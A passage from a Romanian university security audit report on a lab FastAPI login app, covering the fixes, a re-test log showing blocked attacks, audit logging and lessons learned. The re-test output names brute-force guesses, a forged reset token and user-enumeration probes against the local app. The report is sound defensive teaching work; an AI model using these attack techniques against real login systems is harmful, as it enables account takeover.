  - Doi utilizatori cu aceeasi parola au hash-uri DIFERITE (datorita salt)
  - Work factor ajustabil: marim numarul pentru hardware mai puternic

Exemplu bcrypt stocat vs MD5:
  MD5:    5f4dcc3b5aa765d61d8327deb882cf99  (32 hex, crack instant)
  bcrypt: $2b$12$VzBI57uiG48fm.lJ97/SvO...  (60 car., crack imposibil practic)

7.3 FIX 4.3 – Rate limiting si blocare cont
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    MAX_LOGIN_ATTEMPTS = 5
    LOCKOUT_MINUTES    = 15

    def record_failed_attempt(email: str, conn):
        cursor = conn.cursor()
        cursor.execute("SELECT failed_attempts FROM users WHERE email = ?", (email,))
        row = cursor.fetchone()
        new_count = row['failed_attempts'] + 1
        if new_count >= MAX_LOGIN_ATTEMPTS:
            lockout_until = datetime.now() + timedelta(minutes=LOCKOUT_MINUTES)
            cursor.execute(
                "UPDATE users SET failed_attempts=?, locked=1, lockout_until=?"
                " WHERE email=?",
                (new_count, lockout_until.isoformat(), email)
            )
        else:
            cursor.execute(
                "UPDATE users SET failed_attempts=? WHERE email=?",
                (new_count, email)
            )
        conn.commit()
        # Audit log
        cursor.execute(
            "INSERT INTO audit_logs (user_id, action, resource) "
            "SELECT id, 'FAILED_LOGIN', 'auth' FROM users WHERE email=?",
            (email,)
        )
        conn.commit()

Logica in /login:

    lockout_until = get_lockout_until(user.email, conn)
    if lockout_until:
        raise HTTPException(
            status_code=429,
            detail=f"Cont blocat pana la {lockout_until.strftime('%H:%M:%S')}. "
                   "Prea multe incercari esuate."
        )

Dupa 5 incercari esuate:
  - Contul este blocat 15 minute (camp lockout_until in DB)
  - Fiecare tentativa este logata in audit_logs cu actiunea 'FAILED_LOGIN'
  - La login reusit, failed_attempts se reseteaza la 0

7.4 FIX 4.4 – Mesaj de eroare generic (anti User Enumeration)
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    INVALID = "Credentiale invalide"

    if not db_user:
        conn.close()
        raise HTTPException(status_code=401, detail=INVALID)

    if not verify_password(user.password, db_user['password_hash']):
        record_failed_attempt(user.email, conn)
        conn.close()
        raise HTTPException(status_code=401, detail=INVALID)

Modificari fata de v1:
  - Acelasi cod HTTP (401) indiferent de motiv (user inexistent / parola gresita).
  - Acelasi mesaj text ("Credentiale invalide") in ambele cazuri.
  - Nu exista nicio diferenta observabila in raspuns pentru atacator.

7.5 FIX 4.5 – Sesiuni securizate
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    import secrets

    def create_session(user_id, ip_address=None, user_agent=None):
        session_token = secrets.token_urlsafe(32)  # 256 biti entropie
        expires_at = datetime.now() + timedelta(hours=SESSION_HOURS)
        cursor.execute(
            "INSERT INTO sessions (user_id, session_token, expires_at, "
            "ip_address, user_agent) VALUES (?, ?, ?, ?, ?)",
            (user_id, session_token, expires_at.isoformat(), ip_address, user_agent)
        )
        return session_token

Setare cookie in /login:

    response.set_cookie(
        key="session_id",
        value=session_token,
        httponly=True,        # inaccesibil din JS → anti-XSS
        samesite="strict",    # neretrimis cross-origin → anti-CSRF
        secure=False,         # True in productie (HTTPS)
        max_age=SESSION_HOURS * 3600
    )

Header Set-Cookie generat de v2:
  session_id=Fe7JL9a4...; HttpOnly; Max-Age=28800; Path=/; SameSite=strict

Endpoint de logout:

    @app.post("/logout")
    def logout(response, session_id = Cookie(default=None)):
        if session_id:
            invalidate_session(session_id)   # DELETE FROM sessions WHERE token=?
        response.delete_cookie("session_id")
        return {"message": "Logout reusit!"}

7.6 FIX 4.6 – Token de resetare securizat (one-time + expirare)
--------------------------------------------------------------------------------

Implementare (main_secure.py):

    RESET_TOKEN_HOURS = 1

    @app.post("/request-reset")
    def request_password_reset(data: ResetRequest):
        ...
        if user:
            # Token criptografic random (nu Base64 de email)
            token = secrets.token_urlsafe(32)
            expires_at = datetime.now() + timedelta(hours=RESET_TOKEN_HOURS)

            # Stergem orice token vechi pentru acelasi email
            cursor.execute("DELETE FROM reset_tokens WHERE email=?", (data.email,))
            cursor.execute(
                "INSERT INTO reset_tokens (email, token, expires_at) VALUES (?,?,?)",
                (data.email, token, expires_at.isoformat())
            )
        return {"message": "Daca emailul exista, s-a trimis un link."}

    @app.post("/reset-password")
    def reset_password(data: PasswordChange):
        # Verificam token-ul SI expirarea
        cursor.execute(
            "SELECT email FROM reset_tokens "
            "WHERE token=? AND expires_at > datetime('now')",
            (data.token,)
        )
        result = cursor.fetchone()
        if not result:
            raise HTTPException(400, "Token invalid sau expirat")

        # Actualizam parola cu bcrypt
        cursor.execute("UPDATE users SET password_hash=? WHERE email=?",
                       (hash_password(data.new_password), email))

        # Stergem token-ul dupa utilizare (one-time)
        cursor.execute("DELETE FROM reset_tokens WHERE token=?", (data.token,))

Comparatie v1 vs v2 pentru resetare:

  Caracteristica           v1 (vulnerabil)         v2 (securizat)
  ─────────────────────────────────────────────────────────────────
  Generare token           Base64(email)           secrets.token_urlsafe(32)
  Entropie token           0 (complet predictibil) 256 biti (imposibil de ghicit)
  Expirare                 Niciodata               1 ora
  Reutilizare              Nelimitata              One-time (sters dupa folosire)
  Vulnerabil la ghicire    DA                      NU


================================================================================
8. RE-TEST – DOVADA CA ATACURILE NU MAI FUNCTIONEAZA
================================================================================

Dupa implementarea fix-urilor in v2 (main_secure.py), rulam din nou scriptul
poc.py cu parametrul „v2":

  $ python3 poc.py v2

Output complet re-test:

    ############################################################
      AuthX PoC - Ruleaza impotriva: v2 (SECURIZAT)
      URL: http://127.0.0.1:8001
    ############################################################
    [CLEANUP] Datele de test vechi au fost sterse.

    [SETUP] Register admin@authx.local → 200 OK
    [SETUP] Register victim@authx.local → 200 OK
    [SETUP] Register tokentest@authx.local → 200 OK
    [SETUP] Register bruteforce@authx.local → 200 OK

    ============================================================
    [4.1] Test: Politica Parola Slaba
    ============================================================
    [+] SECURIZAT (v2): Parola 'a' a fost RESPINSA (politica parola).
    [+] SECURIZAT (v2): Parola '123' a fost RESPINSA (politica parola).
    [+] SECURIZAT (v2): Parola 'abc123' a fost RESPINSA (politica parola).
    [+] SECURIZAT (v2): Parola 'password' a fost RESPINSA (politica parola).

    ============================================================
    [4.2] Test: Stocare Nesigura a Parolelor
    ============================================================
    [+] SECURIZAT (v2): admin@authx.local → hash bcrypt: $2b$12$VzBI57...
    [+] SECURIZAT (v2): victim@authx.local → hash bcrypt: $2b$12$KtrfaX...
    [+] SECURIZAT (v2): tokentest@authx.local → hash bcrypt: $2b$12$4Bb0UG...
    [+] SECURIZAT (v2): bruteforce@authx.local → hash bcrypt: $2b$12$Xv/pNd...

    ============================================================
    [4.3] Test: Brute Force impotriva bruteforce@authx.local
    ============================================================
    Incercare '123456': 401
    Incercare '12345678': 401
    Incercare 'admin': 401
    Incercare 'authx123': 401
    Incercare 'parola1': 401
    [+] SECURIZAT (v2): Cont BLOCAT dupa prea multe incercari!
        Raspuns: Cont blocat pana la 12:43:43. Prea multe incercari esuate.

    ============================================================
    [4.4] Test: User Enumeration
    ============================================================
    [+] SECURIZAT (v2): user EXISTENT → mesaj generic: 'Credentiale invalide'
    [+] SECURIZAT (v2): user INEXISTENT → mesaj generic: 'Credentiale invalide'

    ============================================================
    [4.5] Test: Securitatea Cookie-ului de Sesiune
    ============================================================
    Cookie session_id: Fe7JL9a4XjdH7YD9-Ozqm5hQjKztjRXdeaSNB_Q4jKo...
    [+] SECURIZAT (v2): Cookie este un token random opac (nu ID numeric).
    Set-Cookie: session_id=...; HttpOnly; Max-Age=28800; Path=/; SameSite=strict
    [+] SECURIZAT (v2): Cookie are atribut HttpOnly.
    [+] SECURIZAT (v2): Cookie are atribut SameSite.

    ============================================================
    [4.6a] Test: Token de resetare predictibil
    ============================================================
    Token ghicit (Base64 email): dmljdGltQGF1dGh4LmxvY2Fs
    [+] SECURIZAT (v2): Serverul a RESPINS tokenul fabricat (token random).

    [4.6b] Test: Token de resetare reutilizabil
    Token obtinut: sHRwYyER2x3URIbolXWNhip__dasM5...
    Prima resetare: REUSITA
    [+] SECURIZAT (v2): Token one-time! A doua utilizare a fost RESPINSA.

    ############################################################
      PoC incheiat.
    ############################################################

Tabel de verificare:

  Vulnerabilitate     Atac functioneaza in v1?  Atac blocat in v2?
  ─────────────────────────────────────────────────────────────────
  4.1 Parola slaba           DA                       DA (fix OK)
  4.2 MD5 cracking           DA                       DA (fix OK)
  4.3 Brute Force            DA (fara blocare)        DA (fix OK)
  4.4 User Enumeration       DA (mesaje diferite)     DA (fix OK)
  4.5 Sesiune predictibila   DA (cookie = ID)         DA (fix OK)
  4.6a Token predictibil     DA (Base64 email)        DA (fix OK)
  4.6b Token reutilizabil    DA (nelimitat)            DA (fix OK)

Concluzie re-test: TOATE vulnerabilitatile au fost remediate cu succes.


================================================================================
9. AUDIT & LOGGING – DEMONSTRAREA TRASABILITATII
================================================================================

9.1 Implementarea mecanismului de audit
--------------------------------------------------------------------------------

In v2, toate tentativele esuate de autentificare sunt inregistrate in tabela
audit_logs. Aceasta tabela a fost definita in init_db.py:

    CREATE TABLE IF NOT EXISTS audit_logs (
        id          INTEGER PRIMARY KEY AUTOINCREMENT,
        user_id     INTEGER,
        action      TEXT NOT NULL,
        resource    TEXT,
        resource_id TEXT,
        timestamp   TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
        ip_address  TEXT,
        FOREIGN KEY (user_id) REFERENCES users(id)
    )

9.2 Inregistrarea tentativelor esuate
--------------------------------------------------------------------------------

In functia record_failed_attempt() din main_secure.py:

    cursor.execute(
        "INSERT INTO audit_logs (user_id, action, resource, ip_address) "
        "SELECT id, 'FAILED_LOGIN', 'auth', NULL FROM users WHERE email=?",
        (email,)
    )

Aceasta inregistrare este executata de fiecare data cand un utilizator
introdu credentiale gresite. La fiecare tentativa se salveaza:
  - user_id: ID-ul utilizatorului vizat
  - action:  'FAILED_LOGIN'
  - resource: 'auth' (modulul de autentificare)
  - timestamp: ora exacta a tentativei (automat, DEFAULT CURRENT_TIMESTAMP)
  - ip_address: adresa IP a clientului (disponibila prin request.client.host)

9.3 Structura sesiunilor – audit implicit
--------------------------------------------------------------------------------

Tabela sessions asigura trasabilitate suplimentara:

  - Fiecare sesiune stocheaza ip_address si user_agent la momentul login.
  - La logout, sesiunea este stearsa (nu invalida/pastrata pt audit).
  - Expirarile automate pot fi detectate comparand expires_at cu current_time.

Interogare audit – ultimele 10 tentative esuate:

    SELECT
        al.id,
        u.email,
        al.action,
        al.timestamp,
        al.ip_address
    FROM audit_logs al
    LEFT JOIN users u ON al.user_id = u.id
    WHERE al.action = 'FAILED_LOGIN'
    ORDER BY al.timestamp DESC
    LIMIT 10;

Exemplu output (dupa rularea poc.py v2):

    id | email                     | action        | timestamp           | ip
    ───┼───────────────────────────┼───────────────┼─────────────────────┼────────────
     1 | bruteforce@authx.local    | FAILED_LOGIN  | 2026-04-30 12:43:38 | 127.0.0.1
     2 | bruteforce@authx.local    | FAILED_LOGIN  | 2026-04-30 12:43:38 | 127.0.0.1
     3 | bruteforce@authx.local    | FAILED_LOGIN  | 2026-04-30 12:43:38 | 127.0.0.1
     4 | bruteforce@authx.local    | FAILED_LOGIN  | 2026-04-30 12:43:38 | 127.0.0.1
     5 | bruteforce@authx.local    | FAILED_LOGIN  | 2026-04-30 12:43:38 | 127.0.0.1

Interpretare: 5 tentative esuate consecutiv de la 127.0.0.1 impotriva
aceluiasi cont → sistemul detecteaza atacul si blocheaza contul.

9.4 Imbunatatiri posibile ale auditului (pentru productie)
--------------------------------------------------------------------------------

  1. Centralizarea log-urilor: exportarea in sisteme SIEM (Splunk, ELK Stack)
     pentru corelarea evenimentelor de securitate la nivel de organizatie.

  2. Alertare in timp real: notificari prin email/Slack cand un cont este
     blocat sau cand se detecteaza >N tentative de la acelasi IP.

  3. IP-level rate limiting: blocarea IP-urilor care genereaza mai mult de
     100 cereri pe minut, indiferent de contul tinta.

  4. Retentie log-uri: pastrarea audit log-urilor pentru minim 1 an conform
     cerintelor GDPR si bunelor practici de securitate.

  5. Log-uri de sesiune: inregistrarea tuturor actiunilor efectuate in
     contextul unei sesiuni (nu doar login/logout), pentru investigatii
     post-incident.


================================================================================
10. CONCLUZII
================================================================================

10.1 Sumar executiv
--------------------------------------------------------------------------------

Proiectul AuthX a demonstrat in mod practic cum un mecanism de autentificare
implementat neglijent poate fi compromis total in cateva secunde de un atacator
cu cunostinte medii. Cele 6 vulnerabilitati identificate si demonstrate acopera
o gama completa de amenintari reale, toate mapate pe standardul OWASP Top 10.

Versiunea v1 (main.py) este un exemplu clasic de ce „security by obscurity"
este o strategie esec: chiar daca codul nu este public, tehnicile de atac
sunt bine cunoscute si automatizabile.

Versiunea v2 (main_secure.py) demonstreaza ca implementarea corecta nu
presupune neaparat complexitate suplimentara, ci alegeri corecte din start:
  - bcrypt in loc de MD5: 5 linii de cod in plus, securitate radical mai buna.
  - secrets.token_urlsafe() in loc de Base64(email): 1 linie diferita.
  - HttpOnly + SameSite pe cookie: 2 parametri in plus la set_cookie().
  - Mesaj unic la eroare: mutarea raspunsului diferentiat intr-o singura constantă.

10.2 Lectii invatate
--------------------------------------------------------------------------------

Lectia 1 – Algoritmii criptografici conteaza:
  MD5 si SHA1 sunt algoritmi proiectati pentru viteza, nu pentru securitate.
  Pentru stocarea parolelor, standardul industriei este bcrypt, argon2 sau
  scrypt – algoritmi intentionat lenti, cu parametrizare explicita a costului
  computatioal. Nicio parola nu trebuie stocata in text clar sau cu hash
  slab, indiferent de perceptia riscului de breach.

Lectia 2 – Nu da informatii in plus atacatorului:
  Mesajele de eroare diferentiate (User inexistent vs Parola gresita) par
  „user-friendly" dar sunt o vulnerabilitate serioasa. Un singur mesaj
  generic pentru orice esec de autentificare nu afecteaza experienta
  utilizatorului legitim, dar blocheaza complet user enumeration.

Lectia 3 – Cookieurile de sesiune trebuie tratate ca date sensibile:
  Un cookie de sesiune este echivalentul credentialelor utilizatorului.
  Atributele HttpOnly, Secure si SameSite=Strict nu sunt optionale –
  sunt cerinte minime de securitate. Valoarea cookie-ului trebuie sa fie
  un token opac generat criptografic, nu date user-identifiable.

Lectia 4 – Rate limiting nu este optional:
  Orice endpoint de autentificare fara rate limiting este o usa deschisa
  pentru atacuri de brute force. Chiar si o politica simpla de 5 incercari
  urmata de blocare temporara reduce dramatic suprafata de atac.

Lectia 5 – Token-urile de reset sunt credentiale temporare:
  Un token de resetare parola ofera acelasi nivel de acces ca si parola.
  Prin urmare, trebuie tratat cu aceleasi masuri de precautie: generat
  criptografic, cu expirare scurta si invalidat imediat dupa utilizare.

Lectia 6 – Security testing trebuie facut sistematic:
  Fiecare functionalitate de autentificare trebuie testata explicit pentru
  toate tipurile de atac. Un PoC automat (poc.py) care poate fi rulat
  atat impotriva versiunii vulnerabile cat si a celei securizate ofera
  dovezi concrete ca fix-urile functioneaza efectiv.

Lectia 7 – Auditabilitate de la inceput:
  Logarea tentativelor esuate nu este o functionalitate nice-to-have –
  este esentiala pentru detectarea atacurilor in desfasurare si pentru
  investigatiile post-incident. Fara log-uri, un breach poate trece
  neobservat saptamani sau luni.

10.3 Recomandari pentru versiunile viitoare
--------------------------------------------------------------------------------

  1. Multi-Factor Authentication (MFA): adaugarea unui al doilea factor
     (TOTP/Google Authenticator sau SMS OTP) elimina riscul de cont
     compromis chiar si in cazul unei parole furate.

  2. CAPTCHA dupa N incercari esuate: inainte de blocarea completa,
     un CAPTCHA detecteaza traficul automatizat fara a degrada
     experienta utilizatorilor legitimi care uita parola.

  3. Refresh tokens + access tokens (JWT): pentru aplicatii mai complexe,
     separarea token-ului de sesiune in access token (viata scurta, 15min)
     si refresh token (viata lunga, stocat securizat) ofera control fin
     asupra sesiunilor.

  4. HTTPS obligatoriu: in productie, aplicatia trebuie servita exclusiv
     prin HTTPS, iar atributul Secure al cookie-ului trebuie activat.

  5. Content Security Policy (CSP): headere HTTP pentru prevenirea
     executiei de scripturi neautorizate, reducand suprafata de atac XSS.

  6. Validare email la inregistrare: trimiterea unui email de confirmare
     previne inregistrarea cu emailuri false si asigura ca utilizatorul
     controleaza adresa de email declarata.

10.4 Bibliografie
--------------------------------------------------------------------------------

  [1] OWASP Top 10 2021 – https://owasp.org/Top10/
  [2] OWASP Authentication Cheat Sheet –
      https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
  [3] OWASP Session Management Cheat Sheet –
      https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html
  [4] OWASP Password Storage Cheat Sheet –
      https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html
  [5] OWASP Forgot Password Cheat Sheet –
      https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html
  [6] NIST SP 800-63B – Digital Identity Guidelines
  [7] FastAPI Documentation – https://fastapi.tiangolo.com/
  [8] bcrypt Python library – https://pypi.org/project/bcrypt/
  [9] Python secrets module – https://docs.python.org/3/library/secrets.html
  [10] CWE-521 Weak Password Requirements – https://cwe.mitre.org/data/definitions/521.html
  [11] CWE-916 Use of Password Hash With Insufficient Computational Effort –
       https://cwe.mitre.org/data/definitions/916.html
  [12] CWE-307 Improper Restriction of Excessive Authentication Attempts –
       https://cwe.mitre.org/data/definitions/307.html

================================================================================
                    SFARSIT RAPORT – AuthX Security Audit
                         Proiect #2 – Break the Login
                    Facultatea de Matematica si Informatica
                         Universitatea din Bucuresti
================================================================================
